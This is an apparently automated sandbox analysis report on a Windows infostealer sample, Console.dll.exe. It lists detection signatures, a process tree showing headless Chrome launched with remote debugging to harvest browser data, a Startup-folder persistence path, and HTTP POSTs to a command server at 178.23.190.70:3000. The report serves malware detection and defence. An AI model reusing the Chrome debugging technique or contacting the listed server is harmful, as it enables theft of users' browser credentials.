Windows Analysis Report
Console.dll.exe

Overview

General Information

Sample name: Console.dll.exe
Analysis ID: 1576691
MD5: 3dabbdb09892b980b8b48deeec718e63
SHA1: 2c8b8f1c993c37fa8464cbf81e787fb1bda5abc1
SHA256: a3229a8a550cd643fd7b33c1265ca01b22370129d7374a099a3ac343c0e5bf3a
Tags: 178-23-190-70, exe, user-JAMESWT_MHT
Infos:

Detection

Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption
AI detected suspicious sample
Contains functionality to prevent local Windows debugging
Drops PE files to the startup folder
Sigma detected: Potential Data Stealing Via Chromium Headless Debugging
Tries to harvest and steal browser information (history, passwords, etc)
Uses known network protocols on non-standard ports
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Sample file is different than original file name gathered from version info
Sigma detected: Browser Execution In Headless Mode
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Console.dll.exe (PID: 3736 cmdline: "C:\Users\user\Desktop\Console.dll.exe" MD5: 3DABBDB09892B980B8B48DEEEC718E63)
    • chrome.exe (PID: 6132 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --remote-allow-origins=* --headless --user-data-dir="C:\Users\user\AppData\Local\google\chrome\User Data" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
      • chrome.exe (PID: 4252 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1728 --field-trial-handle=1436,i,4566748188218501428,17155313862400760302,262144 --disable-features=PaintHolding /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • Console.dll.exe (PID: 7728 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exe" MD5: 3DABBDB09892B980B8B48DEEEC718E63)
    • chrome.exe (PID: 7768 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --remote-allow-origins=* --headless --user-data-dir="C:\Users\user\AppData\Local\google\chrome\User Data" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
      • chrome.exe (PID: 7924 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1788 --field-trial-handle=1528,i,11531674968129144497,11491206366923448469,262144 --disable-features=PaintHolding /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.dll | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\netstandard.dll | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.dll | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |

Source | Rule | Description | Author | Strings
0.2.Console.dll.exe.95c0000.5.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
7.2.Console.dll.exe.9210000.7.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |

System Summary

Source: Process started, Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --remote-allow-origins=* --headless --user-data-dir="C:\Users\user\AppData\Local\google\chrome\User Data", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --remote-allow-origins=* --headless --user-data-dir="C:\Users\user\AppData\Local\google\chrome\User Data", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\Console.dll.exe", ParentImage: C:\Users\user\Desktop\Console.dll.exe, ParentProcessId: 3736, ParentProcessName: Console.dll.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --remote-allow-origins=* --headless --user-data-dir="C:\Users\user\AppData\Local\google\chrome\User Data", ProcessId: 6132, ProcessName: chrome.exe
Source: Process started, Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --remote-allow-origins=* --headless --user-data-dir="C:\Users\user\AppData\Local\google\chrome\User Data", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --remote-allow-origins=* --headless --user-data-dir="C:\Users\user\AppData\Local\google\chrome\User Data", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\Console.dll.exe", ParentImage: C:\Users\user\Desktop\Console.dll.exe, ParentProcessId: 3736, ParentProcessName: Console.dll.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --remote-allow-origins=* --headless --user-data-dir="C:\Users\user\AppData\Local\google\chrome\User Data", ProcessId: 6132, ProcessName: chrome.exe
Source: File created, Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\Console.dll.exe, ProcessId: 3736, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exe
No Suricata rule has matched

AV Detection

Source: Submitted Sample, Integrated Neural Analysis Model: Matched 97.5% probability
Source: Console.dll.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Console.dll.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: Binary string: /_/artifacts/obj/Microsoft.VisualBasic/Release/net8.0-windows/Microsoft.VisualBasic.pdbSHA256^ source: Console.dll.exe
            Source: Binary string: /_/artifacts/obj/System.Resources.ResourceManager/Release/net8.0-windows/System.Resources.ResourceManager.pdb source: System.Resources.ResourceManager.dll.0.dr
            Source: Binary string: Microsoft.VisualBasic.Core.ni.pdb source: Console.dll.exe
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections\Release\net8.0\System.Collections.pdb source: Console.dll.exe, 00000000.00000002.1646723335.000000006EDC1000.00000020.00000001.01000000.00000008.sdmp, Console.dll.exe, 00000007.00000002.2013312223.000000006FAA1000.00000020.00000001.01000000.00000008.sdmp
            Source: Binary string: System.IO.Compression.ZipFile.ni.pdb source: Console.dll.exe, 00000000.00000002.1635631356.000000006BF51000.00000020.00000001.01000000.0000002B.sdmp, Console.dll.exe, 00000007.00000002.2011990883.000000006ED91000.00000020.00000001.01000000.0000002B.sdmp, System.IO.Compression.ZipFile.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.VisualBasic.Core\Release\net8.0-windows\Microsoft.VisualBasic.Core.pdb source: Console.dll.exe
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.NonGeneric\Release\net8.0\System.Collections.NonGeneric.pdbSHA256 source: Console.dll.exe, 00000000.00000002.1646860500.000000006FAC1000.00000020.00000001.01000000.0000002C.sdmp, Console.dll.exe, 00000007.00000002.2013487031.0000000070161000.00000020.00000001.01000000.0000002C.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Serialization.Primitives\Release\net8.0\System.Runtime.Serialization.Primitives.pdb source: System.Runtime.Serialization.Primitives.dll.0.dr
            Source: Binary string: /_/artifacts/obj/System.Configuration/Release/net8.0-windows/System.Configuration.pdb source: System.Configuration.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Console\Release\net8.0-windows\System.Console.pdb source: Console.dll.exe, 00000000.00000002.1646599876.000000006ED91000.00000020.00000001.01000000.00000009.sdmp, Console.dll.exe, 00000007.00000002.2013010421.000000006FA71000.00000020.00000001.01000000.00000009.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Xml.XmlSerializer\Release\net8.0\System.Xml.XmlSerializer.pdbSHA256 source: System.Xml.XmlSerializer.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Security\Release\net8.0-windows\System.Net.Security.pdbSHA256 source: Console.dll.exe, 00000000.00000002.1637368527.000000006C321000.00000020.00000001.01000000.0000001D.sdmp, Console.dll.exe, 00000007.00000002.2009258899.000000006C401000.00000020.00000001.01000000.0000001D.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Registry\Release\net8.0-windows\Microsoft.Win32.Registry.pdb source: Console.dll.exe, Microsoft.Win32.Registry.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.Pipes.AccessControl\Release\net8.0-windows\System.IO.Pipes.AccessControl.pdbSHA256 source: System.IO.Pipes.AccessControl.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.DiagnosticSource\Release\net8.0\System.Diagnostics.DiagnosticSource.pdb source: Console.dll.exe, 00000000.00000002.1637593746.000000006C3C1000.00000020.00000001.01000000.0000001C.sdmp, Console.dll.exe, 00000007.00000002.2009427893.000000006C4A1000.00000020.00000001.01000000.0000001C.sdmp, System.Diagnostics.DiagnosticSource.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Overlapped\Release\net8.0\System.Threading.Overlapped.pdbSHA256;s source: Console.dll.exe, 00000000.00000002.1634148967.000000000C4E2000.00000002.00000001.01000000.00000026.sdmp, Console.dll.exe, 00000007.00000002.2006569993.000000000BD12000.00000002.00000001.01000000.00000026.sdmp
            Source: Binary string: System.Collections.NonGeneric.ni.pdb source: Console.dll.exe, 00000000.00000002.1646860500.000000006FAC1000.00000020.00000001.01000000.0000002C.sdmp, Console.dll.exe, 00000007.00000002.2013487031.0000000070161000.00000020.00000001.01000000.0000002C.sdmp
            Source: Binary string: System.Linq.Expressions.ni.pdb source: Console.dll.exe, 00000000.00000002.1643170420.000000006C861000.00000020.00000001.01000000.00000015.sdmp, Console.dll.exe, 00000007.00000002.2010341131.000000006C901000.00000020.00000001.01000000.00000015.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Process\Release\net8.0-windows\System.Diagnostics.Process.pdb source: Console.dll.exe, 00000000.00000002.1645294849.000000006CBF1000.00000020.00000001.01000000.0000000A.sdmp, Console.dll.exe, 00000007.00000002.2012771691.000000006FA21000.00000020.00000001.01000000.0000000A.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Overlapped\Release\net8.0\System.Threading.Overlapped.pdb source: Console.dll.exe, 00000000.00000002.1634148967.000000000C4E2000.00000002.00000001.01000000.00000026.sdmp, Console.dll.exe, 00000007.00000002.2006569993.000000000BD12000.00000002.00000001.01000000.00000026.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Primitives\Release\net8.0\Microsoft.Win32.Primitives.pdb source: Console.dll.exe
            Source: Binary string: System.Memory.ni.pdb source: Console.dll.exe, 00000000.00000002.1645167317.000000006CBC1000.00000020.00000001.01000000.0000000D.sdmp, Console.dll.exe, 00000007.00000002.2012440781.000000006F9D1000.00000020.00000001.01000000.0000000D.sdmp
            Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Algorithms/Release/net8.0-windows/System.Security.Cryptography.Algorithms.pdb source: System.Security.Cryptography.Algorithms.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Tracing\Release\net8.0\System.Diagnostics.Tracing.pdbSHA256 source: Console.dll.exe, 00000000.00000002.1631801024.0000000009C42000.00000002.00000001.01000000.0000001A.sdmp, Console.dll.exe, 00000007.00000002.2003908860.0000000009472000.00000002.00000001.01000000.0000001A.sdmp, System.Diagnostics.Tracing.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.ThreadPool\Release\net8.0\System.Threading.ThreadPool.pdb source: Console.dll.exe, 00000000.00000002.1634238960.000000000C502000.00000002.00000001.01000000.00000028.sdmp, Console.dll.exe, 00000007.00000002.2006811873.000000000BD42000.00000002.00000001.01000000.00000028.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Security\Release\net8.0-windows\System.Net.Security.pdb source: Console.dll.exe, 00000000.00000002.1637368527.000000006C321000.00000020.00000001.01000000.0000001D.sdmp, Console.dll.exe, 00000007.00000002.2009258899.000000006C401000.00000020.00000001.01000000.0000001D.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq.Expressions\Release\net8.0\System.Linq.Expressions.pdbSHA256 source: Console.dll.exe, 00000000.00000002.1643170420.000000006C861000.00000020.00000001.01000000.00000015.sdmp, Console.dll.exe, 00000007.00000002.2010341131.000000006C901000.00000020.00000001.01000000.00000015.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x86.Release\Corehost.Static\singlefilehost.pdb source: Console.dll.exe, Console.dll.exe.0.dr
            Source: Binary string: System.IO.Compression.ni.pdb source: Console.dll.exe, 00000000.00000002.1635734665.000000006BF61000.00000020.00000001.01000000.0000002A.sdmp, Console.dll.exe, 00000007.00000002.2008096157.000000006C051000.00000020.00000001.01000000.0000002A.sdmp
            Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Primitives/Release/net8.0-windows/System.Security.Cryptography.Primitives.pdb source: System.Security.Cryptography.Primitives.dll.0.dr
            Source: Binary string: System.Security.Cryptography.ni.pdb source: Console.dll.exe, 00000000.00000002.1636900853.000000006C161000.00000020.00000001.01000000.0000001E.sdmp, Console.dll.exe, 00000007.00000002.2008903871.000000006C241000.00000020.00000001.01000000.0000001E.sdmp
            Source: Binary string: /_/artifacts/obj/System.AppContext/Release/net8.0-windows/System.AppContext.pdb source: Console.dll.exe
            Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Primitives/Release/net8.0-windows/System.Security.Cryptography.Primitives.pdbSHA256U source: System.Security.Cryptography.Primitives.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Tasks.Parallel\Release\net8.0\System.Threading.Tasks.Parallel.pdbSHA256| source: System.Threading.Tasks.Parallel.dll.0.dr
            Source: Binary string: System.ComponentModel.TypeConverter.ni.pdb source: Console.dll.exe, 00000000.00000002.1642766032.000000006C7B1000.00000020.00000001.01000000.00000016.sdmp, Console.dll.exe, 00000007.00000002.2010033450.000000006C851000.00000020.00000001.01000000.00000016.sdmp
            Source: Binary string: System.IO.Compression.ZipFile.ni.pdb; source: Console.dll.exe, 00000000.00000002.1635631356.000000006BF51000.00000020.00000001.01000000.0000002B.sdmp, Console.dll.exe, 00000007.00000002.2011990883.000000006ED91000.00000020.00000001.01000000.0000002B.sdmp, System.IO.Compression.ZipFile.dll.0.dr
            Source: Binary string: System.Runtime.InteropServices.ni.pdb source: Console.dll.exe, 00000000.00000002.1646500548.000000006EC51000.00000020.00000001.01000000.0000000C.sdmp, Console.dll.exe, 00000007.00000002.2012640726.000000006FA01000.00000020.00000001.01000000.0000000C.sdmp, System.Runtime.InteropServices.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Primitives\Release\net8.0-windows\System.Net.Primitives.pdbSHA256 source: Console.dll.exe, 00000000.00000002.1638168932.000000006C5F1000.00000020.00000001.01000000.00000019.sdmp, Console.dll.exe, 00000007.00000002.2012133277.000000006EDC1000.00000020.00000001.01000000.00000019.sdmp
            Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net6.0/Newtonsoft.Json.pdbSHA256(s source: Console.dll.exe, 00000000.00000002.1631322072.0000000009B22000.00000002.00000001.01000000.00000013.sdmp, Console.dll.exe, 00000007.00000002.2003760302.00000000093B2000.00000002.00000001.01000000.00000013.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http\Release\net8.0-windows\System.Net.Http.pdb source: Console.dll.exe, 00000000.00000002.1638351948.000000006C631000.00000020.00000001.01000000.00000018.sdmp, Console.dll.exe, 00000007.00000002.2009638328.000000006C6D1000.00000020.00000001.01000000.00000018.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Encodings.Web\Release\net8.0\System.Text.Encodings.Web.pdb source: System.Text.Encodings.Web.dll.0.dr
            Source: Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.core\obj\Release\netstandard2.0\SQLitePCLRaw.core.pdbSHA256CM source: SQLitePCLRaw.core.dll.0.dr
            Source: Binary string: System.Console.ni.pdbP source: Console.dll.exe, 00000000.00000002.1646599876.000000006ED91000.00000020.00000001.01000000.00000009.sdmp, Console.dll.exe, 00000007.00000002.2013010421.000000006FA71000.00000020.00000001.01000000.00000009.sdmp
            Source: Binary string: System.Net.WebSockets.ni.pdb source: System.Net.WebSockets.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.DiagnosticSource\Release\net8.0\System.Diagnostics.DiagnosticSource.pdbSHA256o source: Console.dll.exe, 00000000.00000002.1637593746.000000006C3C1000.00000020.00000001.01000000.0000001C.sdmp, Console.dll.exe, 00000007.00000002.2009427893.000000006C4A1000.00000020.00000001.01000000.0000001C.sdmp, System.Diagnostics.DiagnosticSource.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ComponentModel.Primitives\Release\net8.0\System.ComponentModel.Primitives.pdb source: Console.dll.exe, 00000000.00000002.1647079139.0000000074351000.00000020.00000001.01000000.0000000B.sdmp, Console.dll.exe, 00000007.00000002.2013767303.0000000074351000.00000020.00000001.01000000.0000000B.sdmp, System.ComponentModel.Primitives.dll.0.dr
            Source: Binary string: System.Console.ni.pdb source: Console.dll.exe, 00000000.00000002.1646599876.000000006ED91000.00000020.00000001.01000000.00000009.sdmp, Console.dll.exe, 00000007.00000002.2013010421.000000006FA71000.00000020.00000001.01000000.00000009.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Sockets\Release\net8.0-windows\System.Net.Sockets.pdb source: Console.dll.exe, 00000000.00000002.1636211837.000000006C021000.00000020.00000001.01000000.00000025.sdmp, Console.dll.exe, 00000007.00000002.2008453543.000000006C141000.00000020.00000001.01000000.00000025.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Intrinsics\Release\net8.0\System.Runtime.Intrinsics.pdb source: Console.dll.exe, 00000000.00000002.1634300622.000000000C512000.00000002.00000001.01000000.00000029.sdmp, Console.dll.exe, 00000007.00000002.2006961538.000000000BF12000.00000002.00000001.01000000.00000029.sdmp
            Source: Binary string: /_/artifacts/obj/System.Dynamic.Runtime/Release/net8.0-windows/System.Dynamic.Runtime.pdbSHA256 source: System.Dynamic.Runtime.dll.0.dr
            Source: Binary string: System.Net.Primitives.ni.pdb; source: Console.dll.exe, 00000000.00000002.1638168932.000000006C5F1000.00000020.00000001.01000000.00000019.sdmp, Console.dll.exe, 00000007.00000002.2012133277.000000006EDC1000.00000020.00000001.01000000.00000019.sdmp
            Source: Binary string: System.Net.Http.ni.pdb source: Console.dll.exe, 00000000.00000002.1638351948.000000006C631000.00000020.00000001.01000000.00000018.sdmp, Console.dll.exe, 00000007.00000002.2009638328.000000006C6D1000.00000020.00000001.01000000.00000018.sdmp
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime\Release\net8.0\System.Runtime.pdb source: Console.dll.exe, 00000000.00000002.1630204693.0000000009612000.00000002.00000001.01000000.00000007.sdmp, Console.dll.exe, 00000007.00000002.2001237728.0000000008C42000.00000002.00000001.01000000.00000007.sdmp
            Source: Binary string: System.Memory.ni.pdbc source: Console.dll.exe, 00000000.00000002.1645167317.000000006CBC1000.00000020.00000001.01000000.0000000D.sdmp, Console.dll.exe, 00000007.00000002.2012440781.000000006F9D1000.00000020.00000001.01000000.0000000D.sdmp
            Source: Binary string: /_/artifacts/obj/System.Buffers/Release/net8.0-windows/System.Buffers.pdb source: Console.dll.exe, System.Buffers.dll.0.dr
            Source: Binary string: /_/artifacts/obj/System.Runtime.Serialization/Release/net8.0-windows/System.Runtime.Serialization.pdbSHA256 source: System.Runtime.Serialization.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Encodings.Web\Release\net8.0\System.Text.Encodings.Web.pdbSHA256 source: System.Text.Encodings.Web.dll.0.dr
            Source: Binary string: /_/artifacts/obj/System.Security.Permissions/netcoreapp3.0-Release/System.Security.Permissions.pdb source: System.Security.Permissions.dll.0.dr
            Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Encoding.Extensions\Release\net8.0\System.Text.Encoding.Extensions.pdb source: Console.dll.exe, 00000000.00000002.1629588247.0000000009532000.00000002.00000001.01000000.00000010.sdmp, Console.dll.exe, 00000007.00000002.2002494018.0000000009192000.00000002.00000001.01000000.00000010.sdmp
            Source: Binary string: /_/artifacts/obj/System.IO.UnmanagedMemoryStream/Release/net8.0-windows/System.IO.UnmanagedMemoryStream.pdbSHA256 source: System.IO.UnmanagedMemoryStream.dll.0.dr
            Source: Binary string: System.Net.Primitives.ni.pdb source: Console.dll.exe, 00000000.00000002.1638168932.000000006C5F1000.00000020.00000001.01000000.00000019.sdmp, Console.dll.exe, 00000007.00000002.2012133277.000000006EDC1000.00000020.00000001.01000000.00000019.sdmp

            Networking

            Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 3000
            Source: unknown Network traffic detected: HTTP traffic on port 49816 -> 3000
            Source: Yara match File source: 0.2.Console.dll.exe.95c0000.5.unpack, type: UNPACKEDPE
            Source: Yara match File source: 7.2.Console.dll.exe.9210000.7.unpack, type: UNPACKEDPE
            Source: Yara match File source: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.dll, type: DROPPED
            Source: Yara match File source: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\netstandard.dll, type: DROPPED
            Source: Yara match File source: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.dll, type: DROPPED
            Source: global traffic TCP traffic: 192.168.2.7:49723 -> 178.23.190.70:3000
            Source: global traffic HTTP traffic detected: POST /madbruh HTTP/1.1 Host: 178.23.190.70:3000 Content-Type: multipart/form-data; boundary="cf72a99c-b923-4f30-8451-720f2653c718" Content-Length: 942
            Source: global traffic HTTP traffic detected: POST /madbruh HTTP/1.1 Host: 178.23.190.70:3000 Content-Type: multipart/form-data; boundary="2ed6c9c2-d5ec-4f22-af34-f4f2547d48c9" Content-Length: 942
            Source: unknown TCP traffic detected without corresponding DNS query: 178.23.190.70
            Source: unknown HTTP traffic detected: POST /madbruh HTTP/1.1 Host: 178.23.190.70:3000 Content-Type: multipart/form-data; boundary="cf72a99c-b923-4f30-8451-720f2653c718" Content-Length: 942
            Source: Console.dll.exe, Console.dll.exe.0.dr String found in binary or memory: http://.css
            Source: Console.dll.exe, Console.dll.exe.0.dr String found in binary or memory: http://.jpg
            Source: Console.dll.exe, 00000007.00000002.2000194031.000000000543D000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://178.23.190.70:3000/0
            Source: Console.dll.exe, 00000000.00000002.1628910650.0000000005D06000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://178.23.190.70:3000/d
            Source: Console.dll.exe String found in binary or memory: http://178.23.190.70:3000/madbruh)File
            Source: Console.dll.exe, 00000000.00000002.1629219762.0000000008E40000.00000004.00001000.00020000.00000000.sdmp, Console.dll.exe, 00000007.00000002.2001043438.0000000008660000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://178.23.190.70:3000/madbruhX
            Source: chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/1423136
            Source: chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/2162
            Source: chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/2517
            Source: chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/2970
            Source: chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3078
            Source: chrome.exe, 00000003.00000003.1361038587.00006EEC001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1738667201.00006EEC0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1739509945.00006EEC00278000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1745762051.00001794001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2343915426.0000179400274000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2552107947.0000179400020000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/3205
